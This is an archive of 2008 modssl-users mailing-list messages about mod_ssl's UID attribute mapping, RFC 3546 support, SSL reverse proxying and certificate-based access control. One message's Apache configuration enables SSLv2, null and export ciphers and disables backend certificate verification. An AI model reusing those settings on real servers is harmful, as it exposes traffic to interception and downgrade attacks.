From owner-modssl-users@modssl.org  Fri May 23 18:57:18 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 9A82E14DA62; Fri, 23 May 2008 18:57:18 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from tupari.net (h-66-166-198-124.nycmny83.covad.net [66.166.198.124])
	by master.modssl.org (Postfix) with ESMTP id 07BFC14DA3D
	for ; Fri, 23 May 2008 18:57:17 +0200 (CEST)
Received: from tupari.net (tupari.net [192.168.1.2])
	by tupari.net (8.14.1/8.14.1) with ESMTP id m4NGuncU020893
	for ; Fri, 23 May 2008 12:56:50 -0400
Date: Fri, 23 May 2008 12:56:49 -0400 (EDT)
From: modssl.org@jks.tupari.net
X-X-Sender: jks@tupari.net
To: modssl-users@modssl.org
Subject: RFC 3546 
Message-ID: 
User-Agent: Alpine 1.10 (LFD 962 2008-03-14)
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; format=flowed; charset=US-ASCII
Received-SPF: Pass (client IP white listed); receiver=tupari.net; client-ip=192.168.1.2; envelope-from=
Received-SPF: Pass (client IP white listed); receiver=tupari.net; client-ip=192.168.1.2; helo=
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: modssl.org@jks.tupari.net
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Are there any plans for modssl to support RFC 3546 ?

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat May 24 01:40:16 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 0F8E814D9E9; Sat, 24 May 2008 01:40:16 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mx1.redhat.com (mx1.redhat.com [66.187.233.31])
	by master.modssl.org (Postfix) with ESMTP id B967D14D85B
	for ; Sat, 24 May 2008 01:40:13 +0200 (CEST)
Received: from int-mx1.corp.redhat.com (int-mx1.corp.redhat.com [172.16.52.254])
	by mx1.redhat.com (8.13.8/8.13.8) with ESMTP id m4NNdj3s022749;
	Fri, 23 May 2008 19:39:45 -0400
Received: from turnip.manyfish.co.uk (IDENT:U2FsdGVkX1/LoAbjloVx9U8slXTS9Yp+ZuIIk9hoWpM@vpn-14-20.rdu.redhat.com [10.11.14.20])
	by int-mx1.corp.redhat.com (8.13.1/8.13.1) with ESMTP id m4NNdhBW007999;
	Fri, 23 May 2008 19:39:44 -0400
Received: from jorton by turnip.manyfish.co.uk with local (Exim 4.68)
	(envelope-from )
	id 1JzgrO-0005zf-5f; Sat, 24 May 2008 00:39:42 +0100
Date: Sat, 24 May 2008 00:39:42 +0100
From: Joe Orton 
To: Michael =?utf-8?Q?Str=C3=B6der?= 
Cc: modssl-users@modssl.org
Subject: Re: Extracting SSL_CLIENT_S_DN_UID does not work
Message-ID: <20080523233942.GA22962@redhat.com>
Mail-Followup-To: Michael =?utf-8?Q?Str=C3=B6der?= ,
	modssl-users@modssl.org
References: <483136B9.5020408@stroeder.com> <20080523094229.GA15459@redhat.com> <4836D8D8.4030500@stroeder.com> <20080523150226.GC31834@redhat.com> <4836E176.6050301@stroeder.com>
MIME-Version: 1.0
Content-Type: text/plain; charset=utf-8
Content-Disposition: inline
Content-Transfer-Encoding: 8bit
In-Reply-To: <4836E176.6050301@stroeder.com>
User-Agent: Mutt/1.5.17 (2007-11-01)
Organization: Red Hat UK Ltd, Amberley Place, 107-111 Peascod Street, Windsor, Berkshire, SL4 1TE, United Kingdom.
  Registered in UK and Wales under Company Registration No. 03798903
  Directors: Michael Cunningham (USA), Brendan Lane (Ireland), Matt Parson (USA), Charlie Peters (USA)
X-Scanned-By: MIMEDefang 2.58 on 172.16.52.254
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Joe Orton 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Fri, May 23, 2008 at 05:23:34PM +0200, Michael Ströder wrote:
> Ok, then the OID in my cert is 0.9.2342.19200300.100.1.1 (attribute type 
> 'uid' specified for pilotPerson). That seems right to me since it's 
> compliant with RFC 4514 which contains a table of short and long attribute 
> type names and their OIDs (end of chapter 3).
>
> But now I don't understand the #ifdef-statement mentioned above. From my 
> understanding it MUST NOT reference NID_x500UniqueIdentifier. It MUST 
> reference NID_userId. To me that looks clearly like a bug in mod_ssl.

Changing it would break backwards-compat which is why the #ifdef is 
there (so that the _UID variable refers to the same OID regardless of 
what OpenSSL version si use).

But I don't disagree that it was wrong in the first place.  I vaguely 
recall discussing this somewhere before and deciding we needed an extra 
_UserID-like variable so people can get the (commoner) pilotPerson-type 
uid attribute out of the DN too.

joe
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat May 24 09:19:46 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 5AB1914DA2F; Sat, 24 May 2008 09:19:46 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from srv1.stroeder.com (srv1.stroeder.com [213.240.180.113])
	by master.modssl.org (Postfix) with ESMTP id 1BF5114D85B
	for ; Sat, 24 May 2008 09:19:44 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by srv1.stroeder.com (Postfix) with ESMTP id 63B491C67EA
	for ; Sat, 24 May 2008 09:19:17 +0200 (CEST)
X-Virus-Scanned: amavisd-new at stroeder.com
Received: from srv1.stroeder.com ([127.0.0.1])
	by localhost (srv2.stroeder.com [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id yF78l9Sn0ufP for ;
	Sat, 24 May 2008 09:18:52 +0200 (CEST)
Received: from [10.1.0.2] (unknown [10.1.0.2])
	by srv1.stroeder.com (Postfix) with ESMTP id F2C361C67E5
	for ; Sat, 24 May 2008 09:18:51 +0200 (CEST)
Message-ID: <4837C15B.6050704@stroeder.com>
Date: Sat, 24 May 2008 09:18:51 +0200
From: =?UTF-8?B?TWljaGFlbCBTdHLDtmRlcg==?= 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.13) Gecko/20080313 SeaMonkey/1.1.9
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Extracting SSL_CLIENT_S_DN_UID does not work
References: <483136B9.5020408@stroeder.com> <20080523094229.GA15459@redhat.com> <4836D8D8.4030500@stroeder.com> <20080523150226.GC31834@redhat.com> <4836E176.6050301@stroeder.com> <20080523233942.GA22962@redhat.com>
In-Reply-To: <20080523233942.GA22962@redhat.com>
X-Enigmail-Version: 0.95.6
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?UTF-8?B?TWljaGFlbCBTdHLDtmRlcg==?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Joe Orton wrote:
> On Fri, May 23, 2008 at 05:23:34PM +0200, Michael Ströder wrote:
>> Ok, then the OID in my cert is 0.9.2342.19200300.100.1.1 (attribute type 
>> 'uid' specified for pilotPerson). That seems right to me since it's 
>> compliant with RFC 4514 which contains a table of short and long attribute 
>> type names and their OIDs (end of chapter 3).
>>
>> But now I don't understand the #ifdef-statement mentioned above. From my 
>> understanding it MUST NOT reference NID_x500UniqueIdentifier. It MUST 
>> reference NID_userId. To me that looks clearly like a bug in mod_ssl.
> 
> Changing it would break backwards-compat which is why the #ifdef is 
> there (so that the _UID variable refers to the same OID regardless of 
> what OpenSSL version si use).

1. I seriously doubt that there are any certs out there which use 
x500UniqueIdentifier in the subject-DN. If yes, then these certs are 
also seriously broken.

2. It's simply broken that attribute type UID in mod_ssl differs from 
OpenSSL here.

Ciao, Michael.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat May 24 10:17:10 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4C4D214DA2F; Sat, 24 May 2008 10:17:10 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from srv1.stroeder.com (srv1.stroeder.com [213.240.180.113])
	by master.modssl.org (Postfix) with ESMTP id DBB5B14D85B
	for ; Sat, 24 May 2008 10:17:08 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by srv1.stroeder.com (Postfix) with ESMTP id 7B6061C680E
	for ; Sat, 24 May 2008 10:16:41 +0200 (CEST)
X-Virus-Scanned: amavisd-new at stroeder.com
Received: from srv1.stroeder.com ([127.0.0.1])
	by localhost (srv2.stroeder.com [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id g4wlNpFhWLx7 for ;
	Sat, 24 May 2008 10:16:16 +0200 (CEST)
Received: from [10.1.0.2] (unknown [10.1.0.2])
	by srv1.stroeder.com (Postfix) with ESMTP id 5C1821C680A
	for ; Sat, 24 May 2008 10:16:16 +0200 (CEST)
Message-ID: <4837CED0.9030806@stroeder.com>
Date: Sat, 24 May 2008 10:16:16 +0200
From: =?UTF-8?B?TWljaGFlbCBTdHLDtmRlcg==?= 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.13) Gecko/20080313 SeaMonkey/1.1.9
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: Extracting SSL_CLIENT_S_DN_UID does not work
References: <483136B9.5020408@stroeder.com> <20080523094229.GA15459@redhat.com> <4836D8D8.4030500@stroeder.com> <20080523150226.GC31834@redhat.com> <4836E176.6050301@stroeder.com> <20080523233942.GA22962@redhat.com> <4837C15B.6050704@stroeder.com>
In-Reply-To: <4837C15B.6050704@stroeder.com>
X-Enigmail-Version: 0.95.6
Content-Type: text/plain; charset=UTF-8; format=flowed
Content-Transfer-Encoding: 8bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?UTF-8?B?TWljaGFlbCBTdHLDtmRlcg==?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Michael Ströder wrote:
> Joe Orton wrote:
>> On Fri, May 23, 2008 at 05:23:34PM +0200, Michael Ströder wrote:
>>> Ok, then the OID in my cert is 0.9.2342.19200300.100.1.1 (attribute 
>>> type 'uid' specified for pilotPerson). That seems right to me since 
>>> it's compliant with RFC 4514 which contains a table of short and long 
>>> attribute type names and their OIDs (end of chapter 3).
>>>
>>> But now I don't understand the #ifdef-statement mentioned above. From 
>>> my understanding it MUST NOT reference NID_x500UniqueIdentifier. It 
>>> MUST reference NID_userId. To me that looks clearly like a bug in 
>>> mod_ssl.
>>
>> Changing it would break backwards-compat which is why the #ifdef is 
>> there (so that the _UID variable refers to the same OID regardless of 
>> what OpenSSL version si use).

To come around this: How about letting the deployer specify the OIDs in 
httpd.conf? Backwards-compability could be achieved with this.

Ciao, Michael.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 27 11:20:03 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 514CE14DA47; Tue, 27 May 2008 11:20:03 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mail4.eircom.ie (mail4.eircom.ie [159.134.20.8])
	by master.modssl.org (Postfix) with ESMTP id 8A5D914D85B
	for ; Tue, 27 May 2008 11:20:02 +0200 (CEST)
Received: from unknown (HELO dnexgw02.eircom.ie) ([10.136.5.25])
  by mail4.eircom.ie with ESMTP; 27 May 2008 10:11:49 +0100
X-IronPort-AV: i="4.27,548,1204502400"; 
   d="scan'208,217"; a="64468808:sNHT58459695"
Received: from DNEXVS01.eircom.ie ([10.47.3.1]) by dnexgw02.eircom.ie with Microsoft SMTPSVC(6.0.3790.1830);
	 Tue, 27 May 2008 10:19:33 +0100
X-MimeOLE: Produced By Microsoft Exchange V6.5
Content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C8BFDA.C6A527A7"
Subject: Re: SSL proxy issues
Date: Tue, 27 May 2008 10:19:33 +0100
Message-ID: <0FF26F536ADEBF4ABC1F5F9A86917E730122D3D1@DNEXVS01.eircom.ie>
X-MS-Has-Attach: 
X-MS-TNEF-Correlator: 
Thread-Topic: Re: SSL proxy issues
Thread-Index: Aci/2sZcnRXF4IKSQs202Y5DPC32Lg==
From: 
To: 
X-OriginalArrivalTime: 27 May 2008 09:19:33.0794 (UTC) FILETIME=[C6BA6820:01C8BFDA]
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------_=_NextPart_001_01C8BFDA.C6A527A7
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable

Hi, first time mailer but hoping for some good advice from experienced
users.
=20
Basically Im looking to implement a solution that will redirect SSL
requests coming into my apache server (listening on 443) and forward
them on to a backend server.
I have reverse proxying setup but I cant seem to get it to work for
https connections.
=20
At the moment using the current configuration, below, an http connection
coming into the server on port 80 can be redirected to the https site
configured.
=20
But when I click on a login button on that site Im just getting a blank
screen on Firefox, with no errors showing in the logs?
=20
Has anyone any ideas, cause Ive been looking into this for hours now?
=20
Listen 8080

Listen 443

ServerName F00311.eircom.ie



SSLRandomSeed startup builtin

SSLRandomSeed connect builtin



SSLProxyEngine on

ProxyPass / https://www.365online.com/

ProxyPassReverse / https://www.365online.com/

=20

SSLSessionCache "shmcb:d:/Apache2.2/logs/ssl_scache(512000)"

SSLSessionCacheTimeout 300



SSLEngine On

SSLCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL

SSLCertificateKeyFile "D:\Apache2.2\conf\security\ca.key"

SSLCertificateFile "D:\Apache2.2\conf\security\ca.crt"

ServerName F00311.eircom.ie

SSLProxyEngine on

ProxyPass / https://www.365online.com/

ProxyPassReverse / https://www.365online.com/

SSLProxyVerify none

SSLProxyProtocol all

SSLProxyCipherSuite
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL



=20


***************************************************************
The information contained in this e-mail and any files transmitted=20
with it is confidential and may be subject to legal professional=20
privilege. It is intended solely for the use of the addressee(s).=20
If you are not the intended recipient of this e-mail, please note=20
that any review, dissemination, disclosure, alteration, printing,=20
copying or transmission of this e-mail and/or any file transmitted=20
with it, is prohibited and may be unlawful.=20
If you have received this e-mail by mistake, please promptly=20
inform the sender by reply e-mail and delete the material.=20
Whilst this e-mail message has been swept for the presence of=20
computer viruses, eircom does not, except as required by law,=20
represent, warrant and/or guarantee that the integrity=20
of this communication has been maintained nor that=20
the communication is free of errors, viruses, interception or=20
interference.=20

eircom Limited. Private Company Limited by Shares.=20
Registered in Dublin. Registration Number 98789.
Registered Office - 114 St. Stephen's Green West, Dublin 2.
***************************************************************

------_=_NextPart_001_01C8BFDA.C6A527A7
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable







Hi, first=
 time=20
mailer but hoping for some good advice from experienced=20
users.


 


Basically=
 Im looking=20
to implement a solution that will redirect SSL requests coming into my apac=
he=20
server (listening on 443) and forward them on to a backend=20
server.


I have re=
verse=20
proxying setup but I cant seem to get it to work for https=20
connections.


 


At the mo=
ment using=20
the current configuration, below, an http connection coming into the server=
 on=20
port 80 can be redirected to the https site configured.


 


But when =
I click on=20
a login button on that site Im just getting a blank screen on Firefox, with=
 no=20
errors showing in the logs?


 


Has anyon=
e any=20
ideas, cause Ive been looking into this for hours now?


 




Listen 8080


Listen 443


ServerName F00311.eircom.ie


<IfModule ssl_module>


SSLRandomSeed startup builtin


SSLRandomSeed connect builtin


</IfModule>


SSLProxyEngine on


ProxyPass / https://www.365online.com/


ProxyPassReverse /=20
https://www.365online.com/


 


SSLSessionCache=20
"shmcb:d:/Apache2.2/logs/ssl_scache(512000)"


SSLSessionCacheTimeout 300


<VirtualHost F00311.eircom.ie:443><=
/P>

SSLEngine On


SSLCipherSuite=20
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL


SSLCertificateKeyFile=20
"D:\Apache2.2\conf\security\ca.key"


SSLCertificateFile=20
"D:\Apache2.2\conf\security\ca.crt"


ServerName F00311.eircom.ie


SSLProxyEngine on


ProxyPass / https://www.365online.com/


ProxyPassReverse /=20
https://www.365online.com/


SSLProxyVerify none


SSLProxyProtocol all


SSLProxyCipherSuite=20
ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL


</VirtualHost>


 

***************************************************************
The information contained in this e-mail and any files transmitted=20
with it is confidential and may be subject to legal professional=20
privilege. It is intended solely for the use of the addressee(s).=20
If you are not the intended recipient of this e-mail, please note=20
that any review, dissemination, disclosure, alteration, printing,=20
copying or transmission of this e-mail and/or any file transmitted=20
with it, is prohibited and may be unlawful.=20
If you have received this e-mail by mistake, please promptly=20
inform the sender by reply e-mail and delete the material.=20
Whilst this e-mail message has been swept for the presence of=20
computer viruses, eircom does not, except as required by law,=20
represent, warrant and/or guarantee that the integrity=20
of this communication has been maintained nor that=20
the communication is free of errors, viruses, interception or=20
interference.=20

eircom Limited. Private Company Limited by Shares.=20
Registered in Dublin. Registration Number 98789.
Registered Office - 114 St. Stephen's Green West, Dublin 2.
***************************************************************



------_=_NextPart_001_01C8BFDA.C6A527A7--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue May 27 15:24:41 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 60D3114DA6B; Tue, 27 May 2008 15:24:41 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from fmailhost01.isp.att.net (fmailhost04.isp.att.net [207.115.11.54])
	by master.modssl.org (Postfix) with ESMTP id C158314DA2C
	for ; Tue, 27 May 2008 15:24:40 +0200 (CEST)
Received: from fwebmail03.isp.att.net ([204.127.218.103])
          by isp.att.net (frfwmhc04) with SMTP
          id <20080527132411H0400q009ve>; Tue, 27 May 2008 13:24:11 +0000
X-Originating-IP: [204.127.218.103]
Received: from [74.233.7.212] by fwebmail03.isp.att.net;
	Tue, 27 May 2008 13:24:09 +0000
From: erika20@bellsouth.net
To: modssl-users@modssl.org
Subject: Re: Extracting SSL_CLIENT_S_DN_UID does not work
Date: Tue, 27 May 2008 13:24:09 +0000
Message-Id: <052720081324.29909.483C0B79000B482F000074D522230647629B0A02D2089B9A019C04040A0DBFCFCD0E05079D0A@att.net>
In-Reply-To: <4836D8D8.4030500@stroeder.com>
References: <483136B9.5020408@stroeder.com>
 <20080523094229.GA15459@redhat.com>
 <4836D8D8.4030500@stroeder.com>
X-Mailer: AT&T Message Center Version 1 (Mar 10 2008)
X-Authenticated-Sender: ZXJpa2EyMEBiZWxsc291dGgubmV0
MIME-Version: 1.0
Content-Type: multipart/alternative; boundary="NextPart_Webmail_9m3u9jl4l_29909_1211894649_0"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: erika20@bellsouth.net
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


--NextPart_Webmail_9m3u9jl4l_29909_1211894649_0
Content-Type: text/plain
Content-Transfer-Encoding: 8bit

DONT SEND ME THIS CRAP THANK'S 
-------------- Original message from Michael Ströder : -------------- 


> Joe, 
> 
> many thanks for your response. 
> 
> Joe Orton wrote: 
> > On Mon, May 19, 2008 at 10:13:45AM +0200, Michael Ströder wrote: 
> >> 
> >> Maybe I'm overlooking the obvious but it seems that env var 
> >> SSL_CLIENT_S_DN_UID is not set when using a client cert for authentication. 
> >> 
> >> The following env vars displayed in my SSI HTML text are relevant here 
> >> (obfuscated to protect privacy): 
> >> 
> >> SSL_CLIENT_S_DN: /O=Company Name/OU=Authc/UID=userid/CN=Full name 
> >> SSL_CLIENT_S_DN_UID: (none) 
> >> 
> >> Is it caused by UID not being the leaf RDN? 
> > 
> > That shouldn't make any difference. 
> 
> Ok, fine. 
> 
> > What versions of OpenSSL and httpd/mod_ssl are you using? 
> 
> Actually pre-built RPMs shipped with openSUSE 10.3: 
> 
> # rpm -q openssl apache2 
> openssl-0.9.8e-45.5 
> apache2-2.2.4-70.4 
> 
> Not sure whether these RPMs are based on sources patched by openSUSE. 
> 
> > The "UID" DN tag is ambiguous and probably 
> > maps to something other than what your subject DN uses. 
> > 
> > In the current 2.x mod_ssl sources, UID maps to: 
> > 
> > #ifdef NID_x500UniqueIdentifier /* new name as of Openssl 0.9.7 */ 
> > { "UID", NID_x500UniqueIdentifier }, 
> > #else /* old name, OpenSSL < 0.9.7 */ 
> > { "UID", NID_uniqueIdentifier }, 
> > #endif 
> 
> Hmm, the user ID is already stored by mod_ssl with attribute name "UID" 
> in env var SSL_CLIENT_S_DN. Given that it's OpenSSL 0.9.8 and that the 
> attribute type seems to be interpreted as UID is it safe to assume that 
> the cert contains the right OID? 
> 
> If NID_x500UniqueIdentifier maps to OID 2.5.4.45 it's plain wrong anyway... 
> 
> Ciao, Michael. 
> ______________________________________________________________________ 
> Apache Interface to OpenSSL (mod_ssl) www.modssl.org 
> User Support Mailing List modssl-users@modssl.org 
> Automated List Manager majordomo@modssl.org 
--NextPart_Webmail_9m3u9jl4l_29909_1211894649_0
Content-Type: multipart/related; boundary="NextPart_Webmail_9m3u9jl4l_29909_1211894649_1"


--NextPart_Webmail_9m3u9jl4l_29909_1211894649_1
Content-Type: text/html
Content-Transfer-Encoding: 8bit









DONT SEND ME THIS CRAP THANK'S 


-------------- Original message from Michael Ströder <michael@stroeder.com>: -------------- 


> Joe, 
> 
> many thanks for your response. 
> 
> Joe Orton wrote: 
> > On Mon, May 19, 2008 at 10:13:45AM +0200, Michael Ströder wrote: 
> >> 
> >> Maybe I'm overlooking the obvious but it seems that env var 
> >> SSL_CLIENT_S_DN_UID is not set when using a client cert for authentication. 
> >> 
> >> The following env vars displayed in my SSI HTML text are relevant here 
> >> (obfuscated to protect privacy): 
> >> 
> >> SSL_CLIENT_S_DN: /O=Company Name/OU=Authc/UID=userid/CN=Full name 
> >> SSL_CLIENT_S_DN_UID: (none) 
> >> 
> >> Is it caused by UID not being the leaf RDN? 
> > 
> > That shouldn't make
 any difference. 
> 
> Ok, fine. 
> 
> > What versions of OpenSSL and httpd/mod_ssl are you using? 
> 
> Actually pre-built RPMs shipped with openSUSE 10.3: 
> 
> # rpm -q openssl apache2 
> openssl-0.9.8e-45.5 
> apache2-2.2.4-70.4 
> 
> Not sure whether these RPMs are based on sources patched by openSUSE. 
> 
> > The "UID" DN tag is ambiguous and probably 
> > maps to something other than what your subject DN uses. 
> > 
> > In the current 2.x mod_ssl sources, UID maps to: 
> > 
> > #ifdef NID_x500UniqueIdentifier /* new name as of Openssl 0.9.7 */ 
> > { "UID", NID_x500UniqueIdentifier }, 
> > #else /* old name, OpenSSL < 0.9.7 */ 
> > { "UID", NID_uniqueIdentifier }, 
> > #endif 
> 
> Hmm, the user ID is already stored by mod_ssl with attribute name "UID" 
> in env var SSL_CLIENT_S_DN. Giv
en that it's OpenSSL 0.9.8 and that the 
> attribute type seems to be interpreted as UID is it safe to assume that 
> the cert contains the right OID? 
> 
> If NID_x500UniqueIdentifier maps to OID 2.5.4.45 it's plain wrong anyway... 
> 
> Ciao, Michael. 
> ______________________________________________________________________ 
> Apache Interface to OpenSSL (mod_ssl) www.modssl.org 
> User Support Mailing List modssl-users@modssl.org 
> Automated List Manager majordomo@modssl.org 






--NextPart_Webmail_9m3u9jl4l_29909_1211894649_1--

--NextPart_Webmail_9m3u9jl4l_29909_1211894649_0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Thu May 29 17:35:50 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id D006E14D9D9; Thu, 29 May 2008 17:35:50 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from oxalide-out.extra.cea.fr (oxalide-out.extra.cea.fr [132.168.224.1])
	by master.modssl.org (Postfix) with ESMTP id 7DC7714D82E
	for ; Thu, 29 May 2008 17:35:46 +0200 (CEST)
Received: from nephilia.intra.cea.fr (nephilia.intra.cea.fr [132.166.88.33])
	by oxalide.extra.cea.fr (8.14.2/8.14.2/CEAnet-Internet-out-1.0) with ESMTP id m4TFYnk9019733
	for ; Thu, 29 May 2008 17:34:49 +0200
Received: from muguet2.intra.cea.fr (muguet2.intra.cea.fr [132.166.192.7])
	by nephilia.intra.cea.fr (8.13.8/8.13.8) with ESMTP id m4TFZIU3016969
	for ; Thu, 29 May 2008 17:35:18 +0200
	(envelope-from Gael.de-Chalendar@cea.fr)
Received: from gallo.local (cluny.far.cea.fr [132.167.34.37])
	by muguet2.intra.cea.fr (8.13.8/8.13.8/CEAnet-Intranet-out-1.0) with ESMTP id m4TFZIhr013870
	for ; Thu, 29 May 2008 17:35:18 +0200
From: =?utf-8?q?Ga=C3=ABl_de_Chalendar?= 
Organization: CEA LIST
To: modssl-users@modssl.org
Subject: Authentication handling to access a Web Service
Date: Thu, 29 May 2008 17:25:48 +0200
User-Agent: KMail/1.9.7
MIME-Version: 1.0
Content-Type: text/plain;
  charset="utf-8"
Content-Transfer-Encoding: quoted-printable
Content-Disposition: inline
Message-Id: <200805291725.48267.Gael.de-Chalendar@cea.fr>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?utf-8?q?Ga=C3=ABl_de_Chalendar?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hello,

I have to deploy experimental web services and to limit their access to a=20
limited (but varying) list of people (well, computers). The web services ar=
e=20
developed in C++ using gsoap.

The solution used is to hide the services behind an Apache server using=20
mod_proxy to redirect queries to the services.

The authentication is handled through mod_ssl asking to present a certifica=
te=20
and filtering users on their DN.

Everything works but I'm not administrator of the Apache server. Thus, I=20
cannot edit myself the virtual host SSLRequire definition. I have to ask to=
=20
the administrator through a somewhat long process.

We think that we could place the SSLRequire in a .htaccess of a folder I wo=
uld=20
have the rights on, the mod_proxy handled folders being subfolders of this=
=20
one. The problem here is that the proxying is applied before the SSL=20
certificate verification.

Is there a way to allow me to modify the authorized certificates list witho=
ut=20
having full administrative rights ?

Thanks in advance.

Regards,

Ga=C3=ABl

PS: below are some parts of my configuration files
mod_proxy.conf
 ProxyPass /a/service http://localhost:10001/

/etc/httpd/conf/vhosts.d/01_default_ssl_vhost.conf
SSLVerifyClient require
SSLVerifyDepth 10

a/.htaccess
SSLRequireSSL
SSLRequire ( %{SSL_CLIENT_S_DN_CN} =3D~ m/MY CN/ )

=2D-=20
Gael de Chalendar
CEA-LIST
Centre de Fontenay-aux-Roses
Laboratoire d'Ing=C3=A9nierie de la Connaissance Multim=C3=A9dia Multilingu=
e (LIC2M)
(Multimedia and Multilingual Knowledge Engineering Laboratory)
Bat. 38-2 ; 18, rue du Panorama ; BP 6
92265 Fontenay aux Roses Cedex ; France
T=C3=A9l.:01.46.54.80.18 ; Fax.:01.46.54.75.80
Email : Gael.D.O.T.de-Chalendar.A@T.cea.D.O.T.fr
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Sat May 31 13:08:24 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id BAC5114D889; Sat, 31 May 2008 13:08:24 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from srv1.stroeder.com (srv1.stroeder.com [213.240.180.113])
	by master.modssl.org (Postfix) with ESMTP id BF24714D836
	for ; Sat, 31 May 2008 13:08:23 +0200 (CEST)
Received: from localhost (localhost [127.0.0.1])
	by srv1.stroeder.com (Postfix) with ESMTP id 2CE3B1C65BB
	for ; Sat, 31 May 2008 13:07:55 +0200 (CEST)
X-Virus-Scanned: amavisd-new at stroeder.com
Received: from srv1.stroeder.com ([127.0.0.1])
	by localhost (srv2.stroeder.com [127.0.0.1]) (amavisd-new, port 10024)
	with ESMTP id kX8slN3dO49K for ;
	Sat, 31 May 2008 13:07:06 +0200 (CEST)
Received: from [10.1.0.2] (unknown [10.1.0.2])
	by srv1.stroeder.com (Postfix) with ESMTP id 46B201C65B2
	for ; Sat, 31 May 2008 13:07:06 +0200 (CEST)
